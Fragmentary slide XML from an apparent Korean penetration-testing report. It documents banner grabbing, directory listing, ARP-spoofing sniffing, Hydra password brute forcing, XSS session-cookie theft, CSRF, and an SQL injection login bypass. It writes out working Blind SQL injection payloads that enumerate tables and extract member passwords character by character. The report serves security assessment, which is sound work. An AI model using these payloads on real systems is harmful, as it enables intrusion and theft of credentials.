            <a:endParaRPr kumimoji="0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PUT, DELETE Method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확인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753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그림 22" descr="https://lh6.googleusercontent.com/wOqGca4bdJ-RdFEBE_WAB5p3PRze8Cgl-bWQoUoVD9uypifef9IXRee9Mb26rWo_NYT0WrLaMj5IROusvK0gedRo782IwUIQJbcNRYgQwSILqNH_yBn0sfqswZYdy2JoOxEGyx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301" y="1012387"/>
            <a:ext cx="4819536" cy="197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그림 23" descr="https://lh4.googleusercontent.com/kH4uSnSo00mqFJfpTn_IweA8fcE_1HxTg6dNV7D_qDYigsr8Ji_5RXqmvlBUJjoDo-niW7xkWzUKgQFlvRt3XL7e1Bxf2cJc6v8iv7fXk9LuWYu57v6RCfmqh7KCXBICd2U8_qL-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554" y="3154136"/>
            <a:ext cx="4819536" cy="128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그림 24" descr="https://lh3.googleusercontent.com/SMrvEWqEBxNjyJjvz_4HfiOFwRN8Bi15NsvWssVkiEV4Gvr3RxV5VTEllkYlAAO1Nk_z65WO_U2Cd154tI6BNR-c2bvVGtoVsne4351AGleRjmyYj4CtiuhHr1zJrg9Rj84B22a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054" y="4512924"/>
            <a:ext cx="4742534" cy="37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그림 25" descr="https://lh6.googleusercontent.com/o1RB9CkgdVyMDFMaM--NFbmdlJaZ1Pfo91Yh3LAprRBY9zA8u4Up_xUrs46u_22nzuWgpo3fyPm4DavB6iysvQZTr0rlVwv2JDvmEtL_IkqBXkD7_pIwG_IL1g5fbOBD4W4RJON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552" y="5023075"/>
            <a:ext cx="4781035" cy="163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7179089" y="1263305"/>
            <a:ext cx="4895892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현재 컨설팅 대상의 웹 페이지에 접속 후 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 Response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Packet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을 확인하면 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 헤더를 통해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HTTP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의 버전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, Apache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버전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 OS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종류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, PHP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버전 정보를 확인할 수 있음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3328277" y="33459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7179089" y="3328909"/>
            <a:ext cx="487665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httprint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툴을 이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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: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컨설팅 대상의 메인 페이지 접속 시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https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로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Redirect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되는 것과</a:t>
            </a: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서버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, OS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의 정보</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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노출 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7179089" y="5023075"/>
            <a:ext cx="472437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컨설팅 대상의 웹 페이지 접속 후 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 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기본 페이지에서</a:t>
            </a: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없을 것 같은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파일을 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 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불러오면 웹 페이지에 오류 메시지</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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출력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en-US" altLang="ko-KR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 -&gt;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서버와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OS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의 정보를 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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가능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Banner Grabbing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234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902856" y="11611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회사소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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6ADBD091-2649-4418-A518-2597ECF065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927" y="1246741"/>
            <a:ext cx="3882433" cy="12639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F2E89DA5-923E-4DF7-9468-1B8AEE2685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109" y="2624652"/>
            <a:ext cx="5836046" cy="4021592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 1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A823AD77-EA35-4E3E-88C0-E21E8BAEA6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132" y="895726"/>
            <a:ext cx="4523951" cy="196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2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그림 26" descr="https://lh4.googleusercontent.com/OX4q1fdYc_-ZjaXzQv9kSKGe_SKn12JgWxx_NM0hiEPUFsq8m9Q5bJAcnHklUYLRafMsCZiUofRfw2EG_5kx1S-wo3kTsBqIjHkEyyJYVnGqS99WCsFRe8y8du0WqhJYOfHltET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836" y="1369996"/>
            <a:ext cx="8556858" cy="3069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97188" y="4766388"/>
            <a:ext cx="75135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현재 메인 페이지가 위치한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Main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Directory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상위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Directory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인 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 home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으로 접속</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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-&gt;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Directory Listing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실행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-&gt;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기타 다른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Directory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의 구조를 파악</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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가능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Directory Listing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113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그림 27" descr="https://lh3.googleusercontent.com/8bMeRgwTpA0zvSOhQa1zAoCpLgCHSjUwKWbn4GKZWcIyY84g4aqghdgd-TEUiYSRjd0W9hFkD6F9KZCLQd5sBKn3YUihNLvN5NbPsBKpsLtafvsOERA6sRZhDlCcYfbSQee9T9E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788" y="1222950"/>
            <a:ext cx="8569389" cy="329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967788" y="4791711"/>
            <a:ext cx="8339756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ARP Spoofing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을 이용한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MITM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공격으로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Sniffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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성공 후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-&gt;</a:t>
            </a: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 Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인</a:t>
            </a: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가능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그러나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SSL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을 이용한 암호화 통신</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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중이기 때문 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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-&gt;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 Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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포함된 세션 정보 알아오기 실패</a:t>
            </a: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Sniffing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을 통한 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Session Hijacking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274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그림 28" descr="https://lh3.googleusercontent.com/3yLbkFUbqEt1Y_fCZQC2Kac6NS0oSNNQwnUi5HXB-yB14W-36tRT9QVSyqmlHvpyktgijBkc4uLhJXPQvuzyamli_igw0AzHqOtxcBWfP3fN4M_fk6_d2xj_oZuVgEmD0OFlaJH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734" y="908406"/>
            <a:ext cx="7821447" cy="374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2610703" y="4854921"/>
            <a:ext cx="8749511" cy="1908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모의해킹에 필요한 정상 로그인 정보를 확인하기 위해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계정생성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(ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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: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hacker</a:t>
            </a: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,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비밀번호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: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hacker)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Prose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툴을 이용해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Proxy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서버를 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설정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,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 로그인 시와 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로그인 실패 시 응답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Packet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내용확인</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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로그인 실패 시에만 확인할 수 있는 문자열을 찾아내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Hydra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툴로 공격</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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511175" y="2565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26733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IP / Password Brute Forcing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127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9" descr="https://lh6.googleusercontent.com/02r0W1ytGEse1x70ky6RcKyQtwFw_87bTR3FA2OEKT_VyNTCqVZeaX7Qp8ozjHE1Qjmst0vkitVUT-u6wY9J_NNvWEhQmugjtJHAVfejOV846Zzo-eHYGPNA6OUs4WWSAxdouK5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975" y="1289837"/>
            <a:ext cx="8352991" cy="122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0" descr="https://lh3.googleusercontent.com/HnqHVvp-ptm1qlmUn7BrjCJj7FbUUw-9u2yA4nLAZ6mcpEejpS97apVbZ7Epz6Vghi16ngaGFXRtiMIg-oMZ4cRq9D8JZeyfjgKkGVsYxBICq4vVQTb0-DH79_R0f6Povv85Vx7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975" y="2691693"/>
            <a:ext cx="8352991" cy="38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31" descr="https://lh4.googleusercontent.com/dZgNuTMSNWe82wCVtImEuKrEpjy2XCib74Dvzjn6CiEbigT0_yysuiCBnisU1Wk_zg_KMW3Kz6C4tneLsQh8GHADfYE1wEZNIxqHUcR4Q8eecXdsqvGiRZtOHl9jBsxEybLqXGY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975" y="3398519"/>
            <a:ext cx="8352991" cy="26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3280660" y="4181981"/>
            <a:ext cx="7978466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Hydra </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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툴</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="22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사용</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="22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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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hacker,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="22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user1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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계정에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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Brute Forcing </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="2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 DB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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 저장된 비밀번호와 일치하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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Password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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를 찾아냄</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="en-US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IP / Password Brute Forcing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769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그림 32" descr="https://lh5.googleusercontent.com/q_-TXyJFvw-JhHK8yiSQKvJ6BqIe1JbmlJ06192cLv8HPBYFlMs225J7dcvHBlU40sDG7IsCC6de5Q72bW6Zwgm7XnKeI4T2peY0-62wMk5KIn7C8LLBDSiU4KxW0I26ScBEkMB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580" y="1033579"/>
            <a:ext cx="5628640" cy="233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그림 33" descr="https://lh4.googleusercontent.com/0ddU3kS39GVdlMQP8toNjjDS8SQzd991P6I8J_w6gmNeaBr4z-tNf9Uq3AGAPdtomU96_FqLa95cBhTHfLhlsh3-LLqZsD59JUKwQ5p__96oebD7ll5CXw1BPctBRFRAxaMHm6E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580" y="4056461"/>
            <a:ext cx="5628640" cy="207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8106340" y="1695200"/>
            <a:ext cx="3887603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XSS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공격을 이용해 게시 글에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 Java script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를 등록</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" alt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en-US" altLang="ko-KR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-&gt;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세션 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20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0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쿠키 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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획득</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" alt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가능 여부 확인</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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8085220" y="4601549"/>
            <a:ext cx="3159839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BT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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에서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웹 서비스</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" alt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실행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 쿠키 값 저장을 위해 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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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PHP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파일 생성</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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XSS[Cross Site Script]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공격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306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그림 34" descr="https://lh3.googleusercontent.com/7_vWSOT4ykxkNdM0Wz-gIY9y2bnYOeTDOHLF2F6Cb3ikEksLqKNzozNbrK7fIsC5aCvBKtadBjkxFu4ZxoztXECKeTSqpsAD9kPxKstakeeugvF8wlUoea40DwyMa5R8y959ybN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933" y="940124"/>
            <a:ext cx="9615638" cy="255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" name="그림 35" descr="https://lh5.googleusercontent.com/J4_0rdfi2OXzJKe_F2eoxpfWiRCBfla-KcOLwDZI4X1Xjqm6ii2l50Hxm2i5bYeBCoUq-FqLn00qqeT8N8WnkzRoqqHeLHXGzAhYCKdxGijUChdaIpQNuUN9ZDD6NTIqzq07NYT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933" y="4037610"/>
            <a:ext cx="9055505" cy="226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245488" y="3581387"/>
            <a:ext cx="9902528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XSS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 및 확인 유도 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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게시글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업로드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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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게시 글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확인 후 세션이 저장된 파일 확인</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR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388932" y="6361156"/>
            <a:ext cx="90555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저장된 세션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을</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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적용 후 세션이</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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유지되는지 확인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XSS[Cross Site Script]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공격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162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그림 36" descr="https://lh5.googleusercontent.com/JwzTA3_1-CMLK8w45YthmEWDxohL2ZcnrUDEs0hXqrFQICboD4f_m98GwcaXYp4WG6nV0RLMXae9HQKmho8LcrKIVxnpkIMvp_Xjo8HXrO6VsIfef64QThTO0SEHyVBpomAj7kD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081" y="1139442"/>
            <a:ext cx="8281470" cy="330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749081" y="4749242"/>
            <a:ext cx="804419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회원 정보 수정에서 공격자가 의도한 비밀번호로 변경을 시도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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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그러나 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기존 비밀번호를 확인하는 과정이 포함되어 공격이 어려움</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-K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CSRF[Cross Site Request Forgery]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공격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884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그림 37" descr="https://lh3.googleusercontent.com/GDBnRJCy-fq6XzveZ5GODxgwmye7X0yYNpkhQ19nxCIlBJ9fqvLEBlk4kJtIbOr2L5JpOmiwjPLAunSTlGFK_FKDqu0usGDPuNQTkcYsVJgavpIWHLw66bWiYEuCv3_G9SZuw_i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921" y="871880"/>
            <a:ext cx="4529565" cy="305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5" name="그림 38" descr="https://lh4.googleusercontent.com/Ng0v_Lfzyhm_FIDpIGiTebXSI5Q8H3QLB6kFHGI8FbAmdnCrrQkBJzuzJsAOLH52crQ-qPyQ4oqGrPRdZwbrr0eDZsPG3g7VxQ2wrFTE4L7g-_kNr8LHiw7eG8DRnsidpTfUCHl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446" y="871880"/>
            <a:ext cx="4550605" cy="305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11175" y="19431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715895" y="3886770"/>
            <a:ext cx="831786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글을 게시할 때 넘어가는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Packet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을 확인하고 자동 광고가 가능하도록 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 게시 글 작성 및 업로드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8" name="그림 39" descr="https://lh4.googleusercontent.com/B_F94HakZMf6UlUUACHPI5FdFketOB8fZ6t8WDkBhUF9c3k9_K1yrzFYT0KADnWn0y1_ksv1w1m5bxVpkE8uZYf0Wn36ExSF7dy6Fw3dZRoQa4oYhzCEpYlNKCSaBIbhMBtGockj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921" y="4554070"/>
            <a:ext cx="8990076" cy="153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398658" y="6153604"/>
            <a:ext cx="863510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업로드 된 게시 글을 확인하면 공격자가 원하는 게시 글이 자동으로 등록되는 것을 볼 수 있음 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CSRF[Cross Site Request Forgery]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공격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330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902856" y="135457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12292" name="그림 40" descr="https://lh6.googleusercontent.com/jTcDKUXpxDeBrFCbCsdTcIpnfzI0ltb5RfP1Qq7tJHmg6yyodcKO1HUH7pV93WvDp-u7V9HINGyInGmumL89IhKgSfSWJv8DWJC01QqYg4-zGDWoXIl_Lo_R4e6PmHgulJHWYrm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151" y="1539240"/>
            <a:ext cx="6824181" cy="3437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593522" y="5084221"/>
            <a:ext cx="7013518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‘ or ‘1’=’1’#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을 이용한 다른 인증 우회 공격실패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,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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단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, DB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상에서 해당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SQL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쿼리를 실행했을 때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가장 상위에 위치한 레코드의 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pw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와 같은 값을 비밀번호로 입력하는 경우 해당 레코드 계정으로 접속됨</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0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63819" y="985242"/>
            <a:ext cx="205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인증우회공격</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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3031958" y="4766645"/>
            <a:ext cx="1177169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SQL Injection[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인증우회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, Blind SQL Injection]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113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902856" y="135457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2435973" y="892147"/>
            <a:ext cx="282942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Blind SQL Injection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12295" name="그림 41" descr="https://lh3.googleusercontent.com/g6KjBXbJbSzN95tO9TUWnXFvnAePXI-uQIQT4YbEubF4_69jDynAlV45SIUshmtTCJz0Lr0sltzxGxN9R3N8zvWentzBdAN82JJgxq5GFhoX_JCFljunHFSd2A6PwBLCNzqHrwF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973" y="1488864"/>
            <a:ext cx="7766806" cy="132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435973" y="2883022"/>
            <a:ext cx="27999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Injection Vector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확인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12299" name="그림 42" descr="https://lh3.googleusercontent.com/QGQHsAk9jAwVGvgQs-npQvwdYADd_QmJ0KQmD1e0NVvVgwshsz8x1mo0NKeqqWF78O_zH-u_gRKZshZcz6FHChfHaEpESr2qfr-EvyLo_eysyDHLXKB7iobeFu_0J7H3JvJ58DD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974" y="3318873"/>
            <a:ext cx="8921837" cy="179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그림 43" descr="https://lh6.googleusercontent.com/TsMy-f9I2NpEArm3rZv_GnfLnbUR_QMWFUcGZStAlriivoGKzCX3zLlFZW6Dq8mikZPsYtVAxk8V9nmpRDRWaOyQzT6HRKlfOTy0LheRqcO8yR8YY-AtShAcTdL3VU-Qn2H7iOk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973" y="5159236"/>
            <a:ext cx="8921837" cy="110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3031958" y="4766645"/>
            <a:ext cx="1177169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2435973" y="6399083"/>
            <a:ext cx="76945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Blind SQL Injection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공격을 통해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DB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의 길이와 이름을 확인할 수 있음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SQL Injection[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인증우회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, Blind SQL Injection]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088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B027BA85-1F25-4E87-AD47-9692CB6EB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624" y="1084913"/>
            <a:ext cx="7963387" cy="54084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02856" y="11611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회사소개</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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23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108" y="1416138"/>
            <a:ext cx="3260938" cy="326093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060754" y="5529968"/>
            <a:ext cx="624081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22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쿼리 문을 이용해</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="22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Table, Column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="22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의 이름을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="22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6" name="그림 5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919" y="1049108"/>
            <a:ext cx="3897142" cy="38971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SQL Injection[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인증우회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, Blind SQL Injection]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243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34652" y="0"/>
            <a:ext cx="8887326" cy="6931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054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and length((select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table_name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from (select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table_name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from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information_schema.tables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where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table_schema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=’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SW_db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’ and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table_type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=’base table’ order by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table_name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limit 1) as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vtable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order by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table_name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desc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limit 1))=5%23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="10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1054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and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substr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((select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table_name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from (select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table_name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from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information_schema.tables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where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table_schema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='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SW_db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' and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table_type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='base table' order by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table_name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limit 1) as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vtable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order by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table_name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desc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limit 1), 1, 1)=char(0x42)%23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="10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1054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(select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table_name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from (select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table_name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from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information_schema.tables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where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table_schema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=’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SW_db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’ and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table_type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=’base table’ order by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table_name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limit 1) as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vtable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order by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table_name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desc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limit 1)=”board”%23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="10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1054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ko-KR" altLang="ko-KR" sz="10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1054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and length((select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column_name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from (select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column_name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from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information_schema.columns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where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table_name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='board' order by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column_name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limit 1) as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vtable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order by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column_name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desc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limit 1))=7%23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="10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1054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and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substr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((select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column_name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from (select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column_name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from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information_schema.columns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where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table_name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='greet' order by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column_name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limit 1) as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vtable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order by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column_name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desc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limit 1),1,1)=char(0x43)%23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="10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1054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(select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column_name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from (select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column_name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from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information_schema.columns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where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table_name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='board'\ order by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column_name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limit 1) as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vtable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order by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column_name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desc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limit 1)=”content”%23</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="10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60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그림 44" descr="https://lh5.googleusercontent.com/DbNCB44fBsuTdZL1Te7mDQAu95q4kFLBwhLZJJQAs-2aX41Fh-EkMab3ollGTUnAC1pCfl2R9jmoUsu5p9-nP9TMvtfOLPWt22uB3dNwcX6D52W4krx-IshVVj7AKMylSiATkjR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826" y="1016000"/>
            <a:ext cx="9066998" cy="137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3" name="그림 45" descr="https://lh5.googleusercontent.com/7zumQZIgOxYQcSPheNGTYRk3g61qV_QWRJGppoxvJ6KndlCrNFDkDxgZNzS8TeTIoaseHGts_lYlIVoJ532sjkq_1dxL5nrmbZjfwqRs0U1eOP-F44J7hhD4VLMPKt0RYpGUV4c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826" y="2963627"/>
            <a:ext cx="8091355" cy="44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640226" y="2444438"/>
            <a:ext cx="558161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DB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가 가지고 있는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ID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의 길이 및 내용 확인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685058" y="3416927"/>
            <a:ext cx="852695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and length((select pw from (select </a:t>
            </a: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id,pw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from member order by id limit 1) as </a:t>
            </a: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vtable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order by id </a:t>
            </a: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desc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limit 1))=6%23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and </a:t>
            </a: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substr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((select pw from (select </a:t>
            </a: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id,pw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from member order by id limit 1) as </a:t>
            </a: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vtable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order by id </a:t>
            </a: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desc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limit 1), 1, 1)=char(0x42)%23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and (select pass from (select </a:t>
            </a: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id,pw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from member order by id limit 1) as </a:t>
            </a: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vtable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order by id </a:t>
            </a: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desc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limit 1)=”hacker”%23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and length(select pw from member where id =”hacker”)=6%23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and </a:t>
            </a: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substr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(select pw from member where id =”hacker”), 1, 1)=char(0x42)%23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and (select pw from member where id =”hacker”)=”hacker”%23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비밀번호의 길이 및 내용 확인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SQL Injection[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인증우회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, Blind SQL Injection]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987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502" y="1111532"/>
            <a:ext cx="7444752" cy="54755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98745" y="1417837"/>
            <a:ext cx="5137281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5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ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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DHCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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DHCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Starvation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Strip Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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SNMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>취약점</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2500" b="1" dirty="0">
                <a:latin typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY강B" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>sniffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151472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그림 46" descr="https://lh3.googleusercontent.com/mmlQ9e4Zpmvq7gn_qPaiO1IeAOyjMZRjlcP8Ncxfrut7kRsIfoIVnFXVmENe7zaD4ESu5zOwbUQ_Po_Zz5fmiNyGCnnW0lLhxIQD6ZA9cX29AxcpoaHFJMCTT31wQDfgZsci4c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612" y="1131940"/>
            <a:ext cx="4189199" cy="317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7" name="그림 47" descr="https://lh5.googleusercontent.com/b6HC5XTWIwxWknLCngUFSQX5y84z1PmQ87nBjcgnXN-fH_OiNhzam4H28xZXcCW5nXUpvB34kgw-sB6eJBLYbUYTbJOBh3l7mdv1OMsOHLRs9lvWJXuhoKjFn2tlHkVpDrYTThG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695" y="1131940"/>
            <a:ext cx="4452122" cy="317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733230" y="4513635"/>
            <a:ext cx="877892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공격자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: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BT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으로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경영기획부 네트워크에 침입</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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BT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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            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Gateway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 자신이 경영관리부 직원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PC[10.10.20.10]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이라 속이고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             경영관리부 직원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 자신이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Gateway[10.10.20.254]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라고 속임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공격대상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와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Gateway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가 원활하게 통신할 수 있도록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Forwarding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을 해주고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Sniffing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시작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ARP Spoofing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031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그림 48" descr="https://lh6.googleusercontent.com/zBA6bjQNj3QRJdc3SgXyxwvCsu01n-Ye6FDdjGv3-uWq3RTaamYPmew8MJjFheaBbv1iMPleMbbywNWU3b1eLmLAIebaAltbOqWMAYGTpFL4-3uk9eEB6Yy1mHZubvnqqLFUqhw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306" y="1050119"/>
            <a:ext cx="4432516" cy="303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1" name="그림 49" descr="https://lh6.googleusercontent.com/WwK3FWL8om61FfBk4Woqfe8B5hGxJmcVlOfFag7Vdi8yRStnYNYbgQ_a8W3WhuyeWM6nfeld48TxGy9G4_hMFwjJLxPv0krRlI82g_iDeyl613FDkzeX4Hxq2yoygX58K6g6rWN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327" y="1050118"/>
            <a:ext cx="4496802" cy="303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-216976"/>
            <a:ext cx="5641383" cy="67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646366" y="4416331"/>
